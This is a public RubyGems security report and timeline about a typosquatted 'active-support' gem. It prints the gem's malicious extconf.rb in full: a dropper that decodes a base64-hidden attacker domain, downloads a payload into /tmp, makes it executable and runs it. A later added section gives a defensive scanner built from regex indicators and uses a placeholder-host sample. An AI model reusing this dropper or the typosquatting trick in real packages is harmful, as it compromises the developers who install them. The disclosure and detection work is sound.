Malware in `active-support` gem
State: Resolved (Closed)
Disclosed publicly: 2018-08-09T18:14:31.969Z
Reported to: RubyGems
Weakness: Command Injection - Generic
Bounty: none (not eligible)


Timeline
reed submitted a report to RubyGems.
2018-08-09T09:02:38.599Z

This was sent to RubySec:

The gem duplicates the official activesupport (no hyphen) code, but adds a compiled extension. The extension attempts to resolve a base64-encoded domain (29faea63.planfhntage.de), downloads a payload, and executes it.

active-support-5.2.0.gem/data/ext/trellislike/unflaming/waffling/extconf.rb

require 'net/http'
require 'uri'
require 'base64'
require 'resolv'

class Smectis
  def self.install_explot(weighership)
    if !weighership.nil? and weighership != '0.0.0.0'
      educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming'))
      File.open('/tmp/autosymbiontic', 'wb+') do |uterometer|
        uterometer.binmode
        uterometer.write(educable.body)
        uterometer.chmod(0777)
        uterometer.close
      end
      system('/tmp/autosymbiontic')
    end
  end

  def self.run()
    milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU='
    jaunting = nil
    begin
      jaunting = Resolv.getaddress(Base64.decode64(milligram))
    rescue
    end
    self.install_exploit(jaunting)
  end
end

Smectis.run()

Impact

Run arbitrary code on a victim's machine.

Regards,
Frans
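A defender-side check for the dropper pattern described in the report, added here as an example and not part of the report or of RubyGems' own tooling: it scans an extconf.rb for the indicators listed above (base64-hidden hostname, DNS lookup, HTTP fetch, write to /tmp, chmod, system call) and flags gem names that differ from a known gem only by hyphenation. The indicator regexes, the threshold of three hits, and the constructed sample with its placeholder host are assumptions.

```ruby
require 'base64'

# Static heuristics for the dropper pattern in this report: an extconf.rb that
# hides a hostname in base64, resolves it, fetches a file over HTTP, writes it
# to /tmp, marks it executable and runs it. Hypothetical tooling, not RubyGems'.
INDICATORS = {
  dns_lookup: /\bResolv\.getaddress\b/,
  http_fetch: /\bNet::HTTP\.get(?:_response)?\b|\bopen-uri\b/,
  tmp_write:  %r{File\.open\(['"]/tmp/},
  chmod_exec: /\.chmod\(\s*0?7[0-7]{2}\s*\)/,
  exec_call:  /\bsystem\(|\bexec\(|\bspawn\(|`[^`]+`/
}.freeze
HOSTNAME = /\A(?:[a-z0-9-]+\.)+[a-z]{2,}\z/i

# Base64 string literals in the source that decode to something hostname-shaped.
def hidden_hostnames(src)
  src.scan(%r{['"]([A-Za-z0-9+/]{8,}={0,2})['"]}).flatten.filter_map do |lit|
    decoded = Base64.strict_decode64(lit)
    decoded if decoded.match?(HOSTNAME)
  rescue ArgumentError
    nil # not valid base64, ignore
  end
end

# Returns the indicators hit; three or more means a human should read the file.
def scan_extconf(src)
  hits = INDICATORS.select { |_, re| src.match?(re) }.keys
  hosts = hidden_hostnames(src)
  hits << :base64_hostname unless hosts.empty?
  { hits: hits, hostnames: hosts, suspicious: hits.size >= 3 }
end

# Name check for the other half of the trick: "active-support" vs "activesupport".
def lookalike_of(name, known)
  norm = ->(n) { n.downcase.delete('-_') }
  known.find { |k| k != name && norm[k] == norm[name] }
end

# Constructed sample with a placeholder host (not the code from the report).
SAMPLE = <<~RUBY
  h = Resolv.getaddress(Base64.decode64('#{Base64.strict_encode64('c2.example.invalid')}'))
  r = Net::HTTP.get_response(URI("http://\#{h}/p"))
  File.open('/tmp/dropped', 'wb+') { |f| f.write(r.body); f.chmod(0777) }
  system('/tmp/dropped')
RUBY

puts scan_extconf(SAMPLE).inspect if __FILE__ == $PROGRAM_NAME
```

Run it over the extconf.rb of any gem that ships a native extension; a clean mkmf-only build script produces no hits.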

Activities::Comment
2018-08-09T09:02:39.081Z
Thanks for submitting this report to RubyGems. Our team will review and investigate the issue. Please note that only issues in the rubygems library are eligible for our bug bounty program.


dwradcliffe Activities::BugTriaged
2018-08-09T13:01:59.028Z
Thanks @reed, ack. Working on this now.


dwradcliffe Activities::BugResolved
2018-08-09T13:12:13.727Z
We have removed the malicious gem and taken steps to prevent further malicious actions.


Activities::NotEligibleForBounty
2018-08-09T13:12:23.315Z


reed Activities::AgreedOnGoingPublic
2018-08-09T17:54:59.032Z
Blacklisted in https://github.com/rubygems/rubygems.org/pull/1762. Requesting disclosure.


dwradcliffe Activities::AgreedOnGoingPublic
2018-08-09T18:14:31.914Z


dwradcliffe Activities::ReportBecamePublic
2018-08-09T18:14:32.004Z